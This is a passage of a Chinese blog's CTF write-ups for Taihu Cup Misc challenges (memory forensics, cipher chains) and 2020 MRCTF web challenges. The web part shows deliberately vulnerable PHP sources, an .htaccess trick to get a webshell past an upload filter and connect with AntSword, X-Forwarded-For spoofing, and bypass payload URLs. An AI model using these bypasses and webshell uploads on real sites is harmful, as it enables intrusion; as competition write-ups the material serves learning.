<pre tabindex="0"><code>di`f{e1c64e14db14c6bb8faabab5bd7be1dc}
</code></pre><p>至此无后续了，只有感觉没用到题目hint：bar和bar之间有着非同寻常的联系</p>
<p>感觉那个修复的二维码里还有东西</p>
<p>好了，官方出wp了，我是废物，使用npiet出flag</p>
<p><img src="https://img-blog.csdnimg.cn/20201011005950567.png#pic_center" alt="" /></p>
<h2 id="第一届太湖杯misc题解">第一届太湖杯Misc题解</h2>
<h3 id="memory">memory</h3>
<p>签到题</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">问windows动态链接库管家吧，他会告诉你answer
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">原始题目下载地址：https://pan.baidu.com/s/1tmM-wjyMZ_SHdDJ82Qaq7A<span class="o">(</span>3qci<span class="o">)</span>
</span></span><span class="line"><span class="cl">提前下发的题目压缩包密码：welc0me_to_Asuri_w0rld
</span></span></code></pre></td></tr></table>
</div>
</div><p>题目给的hint感觉有误导性，提示看dll，然是列了一下啥也看不出。然后去给做了web签到题，看了其余两个misc大致啥样，回来继续做。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># iehistory看到桌面的Desktop/Untitled.png</span>
</span></span><span class="line"><span class="cl">volatility -f dump --profile<span class="o">=</span>Win7SP1x86 iehistory
</span></span><span class="line"><span class="cl"><span class="c1"># filescan看一下地址</span>
</span></span><span class="line"><span class="cl">volatility -f dump --profile<span class="o">=</span>Win7SP1x86 filescan <span class="p">|</span> grep <span class="s2">&#34;Untitled.png&#34;</span>
</span></span><span class="line"><span class="cl"><span class="c1"># dumpfiles弄下图片 里面就是flag</span>
</span></span><span class="line"><span class="cl">volatility -f dump --profile<span class="o">=</span>Win7SP1x86 dumpfiles -Q 0x000000003fdf6118 -D ./
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="https://img-blog.csdnimg.cn/20201107172926951.png" alt="" /></p>
<p>拿了个一血还是很香的</p>
<p><img src="https://img-blog.csdnimg.cn/20201107173013546.png" alt="" /></p>
<h3 id="misc-1">misc</h3>
<p>这是最让人蛋疼的一题，这题出的真不太行。</p>
<p>得到一个zip，解压可以得到fun.zip 同时伪加密可以得到omisc.docx</p>
<p>docx里有两行隐藏文字</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">waoootu.epj,nv o
</span></span><span class="line"><span class="cl">www.verymuch.net
</span></span></code></pre></td></tr></table>
</div>
</div><p>前面一直没人解出来，知道给了hint是希尔密码，使用<a href="http://www.atoolbox.net/Tool.php?Id=914">在线工具</a>解得</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">love and peaceee
</span></span></code></pre></td></tr></table>
</div>
</div><p>rabiit解密得到</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">LR2TMNLCGBOHKNDGGVRFY5JWGZTDAXDVMZTDCYK4OU4GCZRYLR2TSNTCHBOHKNJUMM4VY5JVGBSTOXDVHE3DIZC4OU2TIM3ELR2TQYLGHBOHKOJWGQYFY5JWGQ3DSXDVHE3GEOC4OU2TAZJXLR2TOZRTMROHKOBVME4VY5JVGRQTIXDVHAYDEOC4OU4GCZRYLR2TSNTCHBOHKNRRGY3VY5JVHA2WKXDVHAZDOMS4OU2WGMDBLR2TKNDDHFOHKODGMU3FY5JYMFSTMXDVG5QTOYK4OU3DENBQLR2TSNRUMROHKNRSGEYVY5JVMZTDKXDVHE3GEOC4OU3TSNJXLR2TQYLFGZOHKNLGMY2VY5JVGRRTSXDVHE3DIMC4OU2TMYRULR2TKNDDHFOHKNJWMM4VY5JUMZSWKXDVGU4TGN24OU4TMM3GLR2TMY3FGJOHKOBSG4ZFY5JYGM4GCXDVGVRGGMS4OU4GCZJWLR2TKOBVMVOHKNJUHEZFY5JYGM4GCXDVG43TGZK4OU3DEMJRLR2TKNDDHFOHKNRSGQYFY5JUMYYGMXDVHAYDKZK4OU4DKYJZLR2TSNTCHBOHKNRRGBSFY5JZGVRWIXDVGU2DGNS4OU3DENBQLR2TIZTFMVOHKNRWGJTFY5JYGI3TEXDVGY2DMOK4OU4GCMZWLR2TKNTCGROHKNJUMM4VY5JZHA2TQXDVGYYTAZC4OU2TIYZZLR2TKMZXGNOHKNDGMVSVY5JVGRRTSXDVG5QTOYK4OU4DOMLDLR2TSNRUGBOHKNJWMM4VY5JUMYYGMXDVGVTGMNK4OU2TIYZZLR2TMNBWHFOHKNJUMM4VY5JUMVQTMXDVHAZTQYK4OU2TIYZZLR2TONZTMVOHKNJUME2FY5JVHE4DEXDVHE4DKOC4OU2TSOBS
</span></span></code></pre></td></tr></table>
</div>
</div><p>base32得到</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">b<span class="s1">&#39;\\u65b0\\u4f5b\\u66f0\\uff1a\\u8af8\\u96b8\\u54c9\\u50e7\\u964d\\u543d\\u8af8\\u9640\\u6469\\u96b8\\u50e7\\u7f3d\\u85a9\\u54a4\\u8028\\u8af8\\u96b8\\u6167\\u585e\\u8272\\u5c0a\\u54c9\\u8fe6\\u8ae6\\u7a7a\\u6240\\u964d\\u6211\\u5ff5\\u96b8\\u7957\\u8ae6\\u5ff5\\u54c9\\u9640\\u56b4\\u54c9\\u56c9\\u4fee\\u5937\\u963f\\u6ce2\\u8272\\u838a\\u5bc2\\u8ae6\\u585e\\u5492\\u838a\\u773e\\u6211\\u54c9\\u6240\\u4f0f\\u805e\\u85a9\\u96b8\\u610d\\u95cd\\u5436\\u6240\\u4fee\\u662f\\u8272\\u6469\\u8a36\\u56b4\\u54c9\\u9858\\u610d\\u54c9\\u5373\\u4fee\\u54c9\\u7a7a\\u871c\\u9640\\u56c9\\u4f0f\\u5ff5\\u54c9\\u6469\\u54c9\\u4ea6\\u838a\\u54c9\\u773e\\u54a4\\u5982\\u9858\\u5982&#39;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>unicode得到</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">新佛曰：諸隸哉僧降吽諸陀摩隸僧缽薩咤耨諸隸慧塞色尊哉迦諦空所降我念隸祗諦念哉陀嚴哉囉修夷阿波色莊寂諦塞咒莊眾我哉所伏聞薩隸愍闍吶所修是色摩訶嚴哉願愍哉即修哉空蜜陀囉伏念哉摩哉亦莊哉眾咤如願如
</span></span></code></pre></td></tr></table>
</div>
</div><p>新佛曰得到</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Live beautifully, dream passionately, love completely.
</span></span></code></pre></td></tr></table>
</div>
</div><p>解密前面的zip得到音频，频谱图就是flag</p>
<p><img src="https://img-blog.csdnimg.cn/20201107173724828.png#pic_center" alt="" /></p>
<h3 id="broken_secret">broken_secret</h3>
<p>给了个hint：图上信息很重要</p>
<p>这题最后就四个解，我没解出来。</p>
<p>解压得到不能打开的pdf，发现里面obj的o被替换乘了@，换回来就能正常打开了，有个fakeflag，然后里面好像还有两个stream没有被解析，不会做了。</p>
<p><img src="https://img-blog.csdnimg.cn/20201107173916817.png" alt="" /></p>
<h2 id="2020mrctf-writeup">2020MRCTF writeup</h2>
<h3 id="ez_bypass">ez_bypass</h3>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span><span class="lnt">34
</span><span class="lnt">35
</span><span class="lnt">36
</span><span class="lnt">37
</span><span class="lnt">38
</span><span class="lnt">39
</span><span class="lnt">40
</span><span class="lnt">41
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="nx">I</span> <span class="nx">put</span> <span class="nx">something</span> <span class="nx">in</span> <span class="nx">F12</span> <span class="k">for</span> <span class="nx">you</span>
</span></span><span class="line"><span class="cl"><span class="k">include</span> <span class="s1">&#39;flag.php&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nv">$flag</span><span class="o">=</span><span class="s1">&#39;MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;gg&#39;</span><span class="p">])</span><span class="o">&amp;&amp;</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;id&#39;</span><span class="p">]))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$id</span><span class="o">=</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;id&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$gg</span><span class="o">=</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;gg&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="k">if</span> <span class="p">(</span><span class="nx">md5</span><span class="p">(</span><span class="nv">$id</span><span class="p">)</span> <span class="o">===</span> <span class="nx">md5</span><span class="p">(</span><span class="nv">$gg</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="nv">$id</span> <span class="o">!==</span> <span class="nv">$gg</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">echo</span> <span class="s1">&#39;You got the first step&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;passwd&#39;</span><span class="p">]))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$passwd</span><span class="o">=</span><span class="nv">$_POST</span><span class="p">[</span><span class="s1">&#39;passwd&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">            <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nx">is_numeric</span><span class="p">(</span><span class="nv">$passwd</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">            <span class="p">{</span>
</span></span><span class="line"><span class="cl">                 <span class="k">if</span><span class="p">(</span><span class="nv">$passwd</span><span class="o">==</span><span class="mi">1234567</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">                 <span class="p">{</span>
</span></span><span class="line"><span class="cl">                     <span class="k">echo</span> <span class="s1">&#39;Good Job!&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">                     <span class="nx">highlight_file</span><span class="p">(</span><span class="s1">&#39;flag.php&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">                     <span class="k">die</span><span class="p">(</span><span class="s1">&#39;By Retr_0&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">                 <span class="p">}</span>
</span></span><span class="line"><span class="cl">                 <span class="k">else</span>
</span></span><span class="line"><span class="cl">                 <span class="p">{</span>
</span></span><span class="line"><span class="cl">                     <span class="k">echo</span> <span class="s2">&#34;can you think twice??&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">                 <span class="p">}</span>
</span></span><span class="line"><span class="cl">            <span class="p">}</span>
</span></span><span class="line"><span class="cl">            <span class="k">else</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">                <span class="k">echo</span> <span class="s1">&#39;You can not get it !&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">            <span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">die</span><span class="p">(</span><span class="s1">&#39;only one way to get the flag&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">echo</span> <span class="s2">&#34;You are not a real hacker!&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">die</span><span class="p">(</span><span class="s1">&#39;Please input first&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span><span class="nx">Please</span> <span class="nx">input</span> <span class="nx">first</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>源码简单分析就是要md5绕过+is_numeric绕过<br />
<img src="https://img-blog.csdnimg.cn/20200327202729446.png" alt="" /></p>
<h3 id="你传你呢">你传你🐎呢</h3>
<p>尝试以后发现只能上传图片 图片上传后但是连不上</p>
<p>尝试上传其他文件但是全都不行 考虑 .htaccess  允许上传</p>
<p>但是 .htaccess 也不能传 传个图片抓包改下 .htaccess</p>
<p><img src="https://img-blog.csdnimg.cn/20200327210554286.png" alt="" /></p>
<p>最后再传个图片改成 ma.ma 就上传成功了 准备蚁剑</p>
<p>有时候能连成功有时候疯狂报错连上后也很满很慢。。。</p>
<p><img src="https://img-blog.csdnimg.cn/20200327211352887.png" alt="" /><br />
最后找到在flag在根目录</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span><span class="lnt">31
</span><span class="lnt">32
</span><span class="lnt">33
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="c1"># 连上后能看到的upload.php
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="nx">session_start</span><span class="p">();</span>
</span></span><span class="line"><span class="cl"><span class="k">echo</span> <span class="s2">&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">&lt;meta charset=</span><span class="se">\&#34;</span><span class="s2">utf-8</span><span class="se">\&#34;</span><span class="s2">&gt;&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">&#39;user&#39;</span><span class="p">])){</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">&#39;user&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="nx">md5</span><span class="p">((</span><span class="nx">string</span><span class="p">)</span><span class="nx">time</span><span class="p">()</span> <span class="o">.</span> <span class="p">(</span><span class="nx">string</span><span class="p">)</span><span class="nx">rand</span><span class="p">(</span><span class="mi">100</span><span class="p">,</span> <span class="mi">1000</span><span class="p">));</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="k">if</span><span class="p">(</span><span class="nx">isset</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploaded&#39;</span><span class="p">]))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$target_path</span>  <span class="o">=</span> <span class="nx">getcwd</span><span class="p">()</span> <span class="o">.</span> <span class="s2">&#34;/upload/&#34;</span> <span class="o">.</span> <span class="nx">md5</span><span class="p">(</span><span class="nv">$_SESSION</span><span class="p">[</span><span class="s1">&#39;user&#39;</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$t_path</span> <span class="o">=</span> <span class="nv">$target_path</span> <span class="o">.</span> <span class="s2">&#34;/&#34;</span> <span class="o">.</span> <span class="nx">basename</span><span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploaded&#39;</span><span class="p">][</span><span class="s1">&#39;name&#39;</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$uploaded_name</span> <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploaded&#39;</span><span class="p">][</span><span class="s1">&#39;name&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$uploaded_ext</span>  <span class="o">=</span> <span class="nx">substr</span><span class="p">(</span><span class="nv">$uploaded_name</span><span class="p">,</span> <span class="nx">strrpos</span><span class="p">(</span><span class="nv">$uploaded_name</span><span class="p">,</span><span class="s1">&#39;.&#39;</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$uploaded_size</span> <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploaded&#39;</span><span class="p">][</span><span class="s1">&#39;size&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="nv">$uploaded_tmp</span>  <span class="o">=</span> <span class="nv">$_FILES</span><span class="p">[</span><span class="s1">&#39;uploaded&#39;</span><span class="p">][</span><span class="s1">&#39;tmp_name&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl">    <span class="k">if</span><span class="p">(</span><span class="nx">preg_match</span><span class="p">(</span><span class="s2">&#34;/ph/i&#34;</span><span class="p">,</span> <span class="nx">strtolower</span><span class="p">(</span><span class="nv">$uploaded_ext</span><span class="p">))){</span>
</span></span><span class="line"><span class="cl">        <span class="k">die</span><span class="p">(</span><span class="s2">&#34;我扌your problem?&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="k">else</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="k">if</span> <span class="p">(((</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;uploaded&#34;</span><span class="p">][</span><span class="s2">&#34;type&#34;</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;
</span></span></span><span class="line"><span class="cl"><span class="s2">            &#34;</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;uploaded&#34;</span><span class="p">][</span><span class="s2">&#34;type&#34;</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;image/jpeg&#34;</span><span class="p">)</span> <span class="o">||</span> <span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;uploaded&#34;</span><span class="p">][</span><span class="s2">&#34;type&#34;</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;image/pjpeg&#34;</span><span class="p">)</span><span class="o">||</span> <span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;uploaded&#34;</span><span class="p">][</span><span class="s2">&#34;type&#34;</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&#34;image/png&#34;</span><span class="p">))</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nv">$_FILES</span><span class="p">[</span><span class="s2">&#34;uploaded&#34;</span><span class="p">][</span><span class="s2">&#34;size&#34;</span><span class="p">]</span> <span class="o">&lt;</span> <span class="mi">2048</span><span class="p">)){</span>
</span></span><span class="line"><span class="cl">            <span class="nv">$content</span> <span class="o">=</span> <span class="nx">file_get_contents</span><span class="p">(</span><span class="nv">$uploaded_tmp</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="nx">mkdir</span><span class="p">(</span><span class="nx">iconv</span><span class="p">(</span><span class="s2">&#34;UTF-8&#34;</span><span class="p">,</span> <span class="s2">&#34;GBK&#34;</span><span class="p">,</span> <span class="nv">$target_path</span><span class="p">),</span> <span class="mo">0777</span><span class="p">,</span> <span class="k">true</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="nx">move_uploaded_file</span><span class="p">(</span><span class="nv">$uploaded_tmp</span><span class="p">,</span> <span class="nv">$t_path</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="k">echo</span> <span class="s2">&#34;</span><span class="si">{</span><span class="nv">$t_path</span><span class="si">}</span><span class="s2"> succesfully uploaded!&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">        <span class="k">else</span><span class="p">{</span>
</span></span><span class="line"><span class="cl">            <span class="k">die</span><span class="p">(</span><span class="s2">&#34;我扌your problem?&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">        <span class="p">}</span>
</span></span><span class="line"><span class="cl">    <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="cp">?&gt;</span><span class="err">
</span></span></span></code></pre></td></tr></table>
</div>
</div><h3 id="pywebsite">PYwebsite</h3>
<p>第一眼看到题目还以为是py写的website 结果是这题可以付钱py 哈哈有点意思</p>
<p>其实我在首页看了挺久的 啥也没有。。。。<br />
然后看了一下 Target 眼前一亮<br />
<img src="https://img-blog.csdnimg.cn/20200327213303295.png" alt="" /><br />
抓包说他自己可以获得 很明显的xff了<br />
<img src="https://img-blog.csdnimg.cn/20200327213400630.png" alt="" /><br />
改下xff轻松获取flag<br />
<img src="https://img-blog.csdnimg.cn/20200327213542569.png" alt="" /></p>
<h3 id="套娃-1">套娃</h3>
<p>就套娃呗。。。</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="c1">#第一层
</span></span></span><span class="line"><span class="cl"><span class="c1">#payload——http://5772a629-7e5b-45aa-9414-ce874dd6d4ab.merak-ctf.site/?b.u.p.t=23333%0a
</span></span></span><span class="line"><span class="cl"><span class="c1">#php解析会把 . 解析成 _ 
</span></span></span><span class="line"><span class="cl"><span class="c1">#有师傅说这里只过滤了 %0f 其实用 %0F 也可以绕过 但是我试了不行
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">&lt;?</span><span class="nx">php</span>
</span></span><span class="line"><span class="cl"><span class="nv">$query</span> <span class="o">=</span> <span class="nv">$_SERVER</span><span class="p">[</span><span class="s1">&#39;QUERY_STRING&#39;</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> <span class="k">if</span><span class="p">(</span> <span class="nx">substr_count</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="s1">&#39;_&#39;</span><span class="p">)</span> <span class="o">!==</span> <span class="mi">0</span> <span class="o">||</span> <span class="nx">substr_count</span><span class="p">(</span><span class="nv">$query</span><span class="p">,</span> <span class="s1">&#39;%5f&#39;</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">){</span>
</span></span><span class="line"><span class="cl">    <span class="k">die</span><span class="p">(</span><span class="s1">&#39;Y0u are So cutE!&#39;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"> <span class="k">if</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;b_u_p_t&#39;</span><span class="p">]</span> <span class="o">!==</span> <span class="s1">&#39;23333&#39;</span> <span class="o">&amp;&amp;</span> <span class="nx">preg_match</span><span class="p">(</span><span class="s1">&#39;/^23333$/&#39;</span><span class="p">,</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">&#39;b_u_p_t&#39;</span><span class="p">])){</span>
</span></span><span class="line"><span class="cl">    <span class="k">echo</span> <span class="s2">&#34;you are going to the next ~&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>提示flag在secrettw.php 查看源码 是js console跑一下 提示传 Merak(本来我看到页面的ip还以为要改xff呢 结果传个参就行)<br />
<img src="https://img-blog.csdnimg.cn/20200330103846444.png" alt="" /><br />
传参127.0.0.1出源码<br />
<img src="https://img-blog.csdnimg.cn/20200330104053189.png" alt="" /></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt"> 1
</span><span class="lnt"> 2
</span><span class="lnt"> 3
</span><span class="lnt"> 4
</span><span class="lnt"> 5
</span><span class="lnt"> 6
</span><span class="lnt"> 7
</span><span class="lnt"> 8
</span><span class="lnt"> 9
</span><span class="lnt">10
</span><span class="lnt">11
</span><span class="lnt">12
</span><span class="lnt">13
</span><span class="lnt">14
</span><span class="lnt">15
</span><span class="lnt">16
</span><span class="lnt">17
</span><span class="lnt">18
</span><span class="lnt">19
</span><span class="lnt">20
</span><span class="lnt">21
</span><span class="lnt">22
</span><span class="lnt">23
</span><span class="lnt">24
</span><span class="lnt">25
</span><span class="lnt">26
</span><span class="lnt">27
</span><span class="lnt">28
</span><span class="lnt">29
</span><span class="lnt">30
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="c1">#第二层
</span></span></span><span class="line"><span class="cl"><span class="c1">#payload——http://e89f0e7e-b386-4abc-b337-95227c876cf3.merak-ctf.site/secrettw.php?2333=%64%61%74%61%3a%2c%74%6f%64%61%74%20%69%73%20%61%20%68%61%70%70%79%20%64%61%79&amp;file=ZmpdYSZmXGI=
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="o">&lt;?</span><span class="nx">php</span> 
</span></span><span class="line"><span class="cl"><span class="nx">error_reporting</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> 
</span></span><span class="line"><span class="cl"><span class="k">include</span> <span class="s1">&#39;takeip.php&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="nx">ini_set</span><span class="p">(</span><span class="s1">&#39;open_basedir&#39;</span><span class="p">,</span><span class="s1">&#39;.&#39;</span><span class="p">);</span> 	<span class="c1">#为打开文件设置默认当前文件夹
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="k">include</span> <span class="s1">&#39;flag.php&#39;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
